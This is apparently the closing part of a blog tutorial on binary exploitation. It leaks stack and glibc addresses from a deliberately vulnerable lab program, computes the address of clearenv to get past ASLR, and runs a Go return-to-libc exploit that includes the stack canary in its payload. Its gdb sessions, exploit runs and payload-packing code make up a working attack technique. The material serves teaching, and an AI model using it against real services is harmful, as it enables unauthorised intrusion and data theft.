// wrongEndian reverses the byte order of an 8 byte value.
func wrongEndian(src []byte) []byte {
	dst := make([]byte, 8)
	for i := 0; i < 8; i++ {
		dst[8-1-i] = src[i]
	}
	return dst
}
We can test the exploit using the clearenv address we obtained from the gdb’ed big-roi process:
$ go run cmd/exploit/main.go 127.0.0.1:6666 0x7ffff7ddf830
initial output from vulnerable program: 'incorrect password: <snip>'
call stack canary: '0xca9055feff69a500'
preserving chunk: '0x00005555555553e0'
preserving chunk: '0x00005555555559d0'
preserving chunk: '0x00007fffffffe550'
existing return instruction pointer: '0x0000555555555768'
clearenv address: '0x00007ffff7ddf830'
sending payload: 0x<snip>004cf6a1794162dce053555555550000d05955555555000050e5ffffff7f000030f8ddf7ff7f00006857555555550000
getting secret file contents...
secret file contents: 'foobar
'
Locating glibc addresses
While we have successfully validated our exploit in a test environment, we still need to find clearenv’s address without the debugger’s help. Incidentally, we do need to rely on gdb just a bit more. As we examined in part two, if we can find pointers to glibc code on the stack, we can use them to work our way back to the glibc version used at runtime. Since the stack layout will be the same regardless of ASLR or other mitigations, we can simply leak those addresses by knowing where they are in the Go slice.
Start big-roi in gdb again:
$ gdb /tmp/big-roi
(gdb) r 6666 /tmp/secret-data
Starting program: /tmp/big-roi 6666 /tmp/secret-data
And run the “leak” Go program again, this time redirecting stderr to stdout (the program logs to stderr) and grepping for “ 7f”. This will filter for potential library mappings (recall from part two that this is the memory region where libraries are typically mapped to on Linux):
$ go run cmd/leak/main.go 127.0.0.1:6666 2>&1 | grep ' 7f'
chunk 1: 7fffffffe4b0
chunk 4: 7fffffffe8c6
chunk 10: 7fffffffe5d0
chunk 12: 7fffffffe6c0
chunk 15: 7fffffffe6c0
chunk 18: 7fffffffe5d0
chunk 19: 7ffff7e2800d
chunk 21: 7ffff7f826a0
chunk 25: 7ffff7e29ad1
chunk 42: 7fffffffe550
chunk 44: 7fffffffe8c6
chunk 46: 7fffffffe5d0
chunk 48: 7fffffffe6c8
And once again pause big-roi’s execution with ctrl+c and look up each address to see if it is associated with a glibc symbol:
^C
Program received signal SIGINT, Interrupt.
# Chunk 1:
(gdb) info symbol 0x7fffffffe4b0
No symbol matches 0x7fffffffe4b0.
# Chunk 4:
(gdb) info symbol 0x7fffffffe8c6
No symbol matches 0x7fffffffe8c6.
# Chunk 10:
(gdb) info symbol 0x7fffffffe5d0
No symbol matches 0x7fffffffe5d0.
# Chunk 12:
(gdb) info symbol 0x7fffffffe6c0
No symbol matches 0x7fffffffe6c0.
# Chunk 19:
(gdb) info symbol 0x7ffff7e2800d
_IO_file_write + 45 in section .text of /lib/x86_64-linux-gnu/libc.so.6
# Chunk 21:
(gdb) info symbol 0x7ffff7f826a0
_IO_2_1_stdout_ in section .data of /lib/x86_64-linux-gnu/libc.so.6
# Chunk 25:
(gdb) info symbol 0x7ffff7e29ad1
_IO_do_write + 177 in section .text of /lib/x86_64-linux-gnu/libc.so.6
When info symbol locates an address in a known symbol it includes not only the symbol name and its relative offset to the symbol, but also the memory-mapped object the symbol originates from. As seen above, chunks 19, 21, and 25 are from the glibc shared object /lib/x86_64-linux-gnu/libc.so.6.
Note that gdb’s x command shows some of these glibc symbols with the word new in their names (for example, _IO_new_file_write instead of _IO_file_write). This can add a layer of confusion when debugging an exploit.
Exploiting big-roi for real
We have developed information leak and exploit automation, and verified that both work in a test environment. It is time to exploit big-roi outside of gdb. The steps involved will be mostly the same, but this time we will add a little bit of basic arithmetic.
Start by running big-roi outside of gdb:
$ export PASSWORD_BCRYPT=$(openssl rand -base64 16 | openssl passwd -stdin -5)
$ /tmp/big-roi 6666 /tmp/secret-data
In another shell, run the leak program and find the memory chunk indexes that contained glibc pointers earlier:
$ go run cmd/leak/main.go 127.0.0.1:6666
# ...
chunk 19: 7f3568bf400d
chunk 21: 7f3568d4e6a0
chunk 25: 7f3568bf5ad1
# ...
Before we can look these addresses up in a glibc database tool like libc.blukat.me, we need to do a bit of math. Remember, two of these addresses point into the middle of a function rather than at its start: info symbol reported offsets of 45 and 177 bytes for chunks 19 and 25. Subtracting those offsets recovers the address of each symbol:
# Chunk 19: _IO_file_write + 45
0x7f3568bf400d - 0x2d = 0x7f3568bf3fe0
# Chunk 21: _IO_2_1_stdout_
0x7f3568d4e6a0
# Chunk 25: _IO_do_write + 177
0x7f3568bf5ad1 - 0xb1 = 0x7f3568bf5a20
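The same adjustment can be scripted. The following is a minimal Go sketch and not part of the big-roi repository: it parses the "symbol + offset" text that info symbol printed in the gdb session and subtracts the offset from the matching leaked address. The helper name parseSymbolOffset is my own, chosen for illustration, and the sketch assumes Go 1.18 or newer for strings.Cut.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// parseSymbolOffset splits the leading part of a gdb "info symbol" line,
// such as "_IO_file_write + 45 in section .text of ...", into the symbol
// name and its decimal offset. A line without "+ N" yields offset 0.
// (Hypothetical helper, named for this sketch only.)
func parseSymbolOffset(line string) (string, uint64, error) {
	head, _, _ := strings.Cut(line, " in section ")
	name, off, found := strings.Cut(head, " + ")
	if !found {
		return strings.TrimSpace(head), 0, nil
	}
	n, err := strconv.ParseUint(strings.TrimSpace(off), 10, 64)
	if err != nil {
		return "", 0, err
	}
	return strings.TrimSpace(name), n, nil
}

func main() {
	// Leaked addresses from the run outside gdb, paired with the
	// "info symbol" text seen for the same chunks inside gdb.
	leaks := []struct {
		addr uint64
		gdb  string
	}{
		{0x7f3568bf400d, "_IO_file_write + 45 in section .text of /lib/x86_64-linux-gnu/libc.so.6"},
		{0x7f3568d4e6a0, "_IO_2_1_stdout_ in section .data of /lib/x86_64-linux-gnu/libc.so.6"},
		{0x7f3568bf5ad1, "_IO_do_write + 177 in section .text of /lib/x86_64-linux-gnu/libc.so.6"},
	}
	for _, l := range leaks {
		name, off, err := parseSymbolOffset(l.gdb)
		if err != nil {
			fmt.Println("skipping:", err)
			continue
		}
		fmt.Printf("%-16s 0x%x - 0x%x = 0x%x\n", name, l.addr, off, l.addr-off)
	}
}
```

Keep in mind that gdb prints the offset in decimal, so 45 and 177 become 0x2d and 0xb1 in the hexadecimal arithmetic above.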
Use one of the glibc databases we discussed in part two to look up the symbols. In my case, libc.blukat.me narrowed it down to three possibilities:
- libc6_2.31-0ubuntu9.1_amd64
- libc6_2.31-0ubuntu9.2_amd64
- libc6_2.31-0ubuntu9_amd64
In the real world, you would need to test all three versions. To keep things simple, we will pretend we did that and found that option two (ubuntu9.2_amd64) is the target. These databases typically provide the offset of each symbol relative to the beginning of the file. This is important because subtracting a symbol’s offset from its leaked address reveals the base address of glibc. From there, we can add the offset of clearenv, which yields the absolute address of that function:
# <_IO_file_write addr> <offset> <glibc base addr>
0x7f3568bf3fe0 - 0x091fe0 = 0x7f3568b62000
# <glibc base addr> <clearenv offset> <clearenv addr>
0x7f3568b62000 + 0x049830 = 0x7f3568bab830
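For readers who would rather not do this by hand, here is a minimal Go sketch of the same calculation. It is an illustration under the assumptions stated in this post (the two offsets are the ones quoted above for libc6_2.31-0ubuntu9.2_amd64) and is not code from the exploit program. The function name glibcBase is hypothetical. The page-alignment check is an extra sanity test I added: shared objects are mapped on page boundaries, so a base address whose low 12 bits are not zero usually means the wrong glibc version was picked.

```go
package main

import "fmt"

// Offsets inside libc6_2.31-0ubuntu9.2_amd64, as quoted in the text.
const (
	ioFileWriteOffset = 0x091fe0
	clearenvOffset    = 0x049830
)

// glibcBase derives the load address of glibc from one resolved symbol.
// (Hypothetical helper, named for this sketch only.)
func glibcBase(symbolAddr, symbolOffset uint64) (uint64, error) {
	if symbolAddr < symbolOffset {
		return 0, fmt.Errorf("offset 0x%x is larger than address 0x%x", symbolOffset, symbolAddr)
	}
	base := symbolAddr - symbolOffset
	// A base that is not 4 KiB aligned suggests a wrong glibc build
	// or a bad leak.
	if base&0xfff != 0 {
		return 0, fmt.Errorf("base 0x%x is not page aligned", base)
	}
	return base, nil
}

func main() {
	base, err := glibcBase(0x7f3568bf3fe0, ioFileWriteOffset)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("glibc base: 0x%x\n", base)
	fmt.Printf("clearenv:   0x%x\n", base+clearenvOffset)

	// The other two leaks expressed as offsets from the base. Comparing
	// these against the database entry is a cheap cross-check.
	fmt.Printf("_IO_2_1_stdout_ offset: 0x%x\n", 0x7f3568d4e6a0-base)
	fmt.Printf("_IO_do_write offset:    0x%x\n", 0x7f3568bf5a20-base)
}
```

If the offsets printed for the other two symbols do not match the database entry for the chosen glibc version, that version is probably not the one running on the target.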
Finally, plug the calculated address of clearenv into the exploit program:
$ go run cmd/exploit/main.go 127.0.0.1:6666 0x7f3568bab830
initial output from vulnerable program: 'incorrect password: <...>'
call stack canary: '0xdb1d60c36b92ed00'
preserving chunk: '0x000056321d4b53e0'
preserving chunk: '0x000056321d4b59d0'
preserving chunk: '0x00007fff6b51c0a0'
existing return instruction pointer: '0x000056321d4b5768'
clearenv address: '0x00007f3568bab830'
sending payload: 0x<...>00ed926bc3601ddbe0534b1d32560000d0594b1d32560000a0c0516bff7f000030b8ba68357f000068574b1d32560000
getting secret file contents...
secret file contents: 'foobar
'
w00t!
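The visible tail of the payload is worth a second look: it is simply the values printed above it, each written as eight bytes in little-endian order. The Go sketch below reproduces that tail from the logged values. It is an illustration only. The ordering is read off the output above, the function name payloadTail is my own, and the real exploit program may assemble its payload differently.

```go
package main

import (
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// payloadTail packs 64-bit values in little-endian byte order, which is
// how x86-64 stores them in memory.
// (Hypothetical helper, named for this sketch only.)
func payloadTail(values ...uint64) []byte {
	out := make([]byte, 8*len(values))
	for i, v := range values {
		binary.LittleEndian.PutUint64(out[i*8:], v)
	}
	return out
}

func main() {
	tail := payloadTail(
		0xdb1d60c36b92ed00, // call stack canary
		0x000056321d4b53e0, // preserved chunk
		0x000056321d4b59d0, // preserved chunk
		0x00007fff6b51c0a0, // preserved chunk
		0x00007f3568bab830, // clearenv address
		0x000056321d4b5768, // existing return instruction pointer
	)
	fmt.Println(hex.EncodeToString(tail))
}
```

Note where the clearenv address sits in this run: directly before the original return instruction pointer.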
Conclusion
In this series, we examined glibc’s relationship with a vulnerable program and an exploit. We located useful process state by capitalizing on the repeatability of the call stack layout, the default higher bits of addresses (0x00007f and 0x000055), and the structure of a call stack canary.
We also explored techniques for working around mitigations like ASLR and NX.
A high-level understanding of these topics allowed us to discover and leak useful information about a vulnerable program. We automated the creation and delivery of our exploit using two simple Go programs, which ultimately allowed us to bypass the vulnerable program’s built-in defenses.
The overall strategy remains largely the same despite thirty years of advancements in defenses: find a way to subvert a process' control flow, locate useful glibc code, and pivot execution to that code. Unfortunately, documentation on this subject is often fragmented or was written before the introduction of contemporary mitigations.
While esoteric, I believe this information should be accurate and easy to obtain, not only so others can learn about binary exploitation, but also so we can learn from the shortcomings of iterative security mitigations.
Thank you for reading. Good night, and good luck.
References
- blog.zecops.com. 2021, July 17. “Meet WiFiDemon - iOS WiFi RCE 0-day Vulnerability, and a Zero-Click Vulnerability That Was Silently Patched”.
- scutt / Team TESO. 2001, September 1. “Exploiting Format String Vulnerabilities (version 1.2)”.
- david942j. Accessed: 2022, April 20. “one_gadget - The best tool for finding one gadget RCE in libc.so.6”.
- linux.die.net. Accessed: 2022, May 1. “unsetenv(3) - Linux man page”.
- linux.die.net. Accessed: 2022, May 1. “clearenv(3) - Linux man page”.
- Bendersky, Eli. 2011, September 6. “Stack frame layout on x86-64”.
- cons.mit.edu. 2017. “X86-64 Architecture Guide”.
- Krzyzanowski, Paul. 2018, February 16. “Stack frames”.
- felixcloutier.com. Accessed: 2022, May 1. “RET - Return from Procedure”.